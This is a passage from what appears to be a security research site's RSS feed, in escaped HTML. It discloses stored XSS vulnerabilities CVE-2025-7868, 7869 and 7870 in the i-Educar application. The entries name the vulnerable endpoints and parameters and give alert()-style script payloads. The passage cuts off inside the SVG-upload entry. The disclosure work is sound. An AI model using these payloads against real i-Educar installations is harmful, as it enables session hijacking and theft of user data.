    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7867.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7868</title>
        <link>https://www.cvehunters.com/p/cve-2025-7868/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7868/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7868-cross-site-scripting-xss-stored-endpoint-educar_calendario_dia_motivo_cadphp-parameter-cod_calendario_dia_motivo&amp;#34;&amp;gt;CVE-2025-7868: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7868&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7868&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7868-cross-site-scripting-xss-stored-endpoint-educar_calendario_dia_motivo_cadphp-parameter-cod_calendario_dia_motivo&amp;#34;&amp;gt;CVE-2025-7868: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7868&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7868&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_calendario_dia_motivo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cod_calendario_dia_motivo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7868/image-1.png&amp;#34;
	width=&amp;#34;1895&amp;#34;
	height=&amp;#34;984&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7868/image-1_hu_97d38405728c544.png 480w, /p/cve-2025-7868/image-1_hu_3a6a150e1d9596b7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7868/image.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;969&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7868/image_hu_a173bc0dd1ee021a.png 480w, /p/cve-2025-7868/image_hu_61aa51eb4a1fba4a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;196&amp;#34;
		data-flex-basis=&amp;#34;472px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/RtXMxNLuAx8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/RtXMxNLuAx8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7868.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7869</title>
        <link>https://www.cvehunters.com/p/cve-2025-7869/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7869/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7869-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_detphp-parameter-cod_turma_tipo&amp;#34;&amp;gt;CVE-2025-7869: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7869-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_detphp-parameter-cod_turma_tipo&amp;#34;&amp;gt;CVE-2025-7869: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7869&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_turma_tipo_det.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;cod_turma_tipo&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar PaCXXX&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7869/image.png&amp;#34;
	width=&amp;#34;1869&amp;#34;
	height=&amp;#34;982&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7869/image_hu_a2589e8ed4337362.png 480w, /p/cve-2025-7869/image_hu_17deafef38d887a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;456px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7869/image-1.png&amp;#34;
	width=&amp;#34;1908&amp;#34;
	height=&amp;#34;961&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7869/image-1_hu_fab2a14a1c166956.png 480w, /p/cve-2025-7869/image-1_hu_8f2641744613856f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;198&amp;#34;
		data-flex-basis=&amp;#34;476px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/RtXMxNLuAx8&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/RtXMxNLuAx8&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7869.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 20 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7870</title>
        <link>https://www.cvehunters.com/p/cve-2025-7870/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7870/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7870-cross-site-scripting-xss-storage-injection-via-svg-upload&amp;#34;&amp;gt;CVE-2025-7870: Cross-Site Scripting (XSS) Storage Injection via SVG Upload
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7870&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;An attacker can upload a malicious SVG file containing embedded JavaScript that is executed when the file is accessed directly. This results in Stored Cross-Site Scripting (XSS).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The &amp;lt;code&amp;gt;justificativas-de-falta&amp;lt;/code&amp;gt; endpoint allows users to upload files after upload a crafted svg the XSS could be trigger when open the file.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
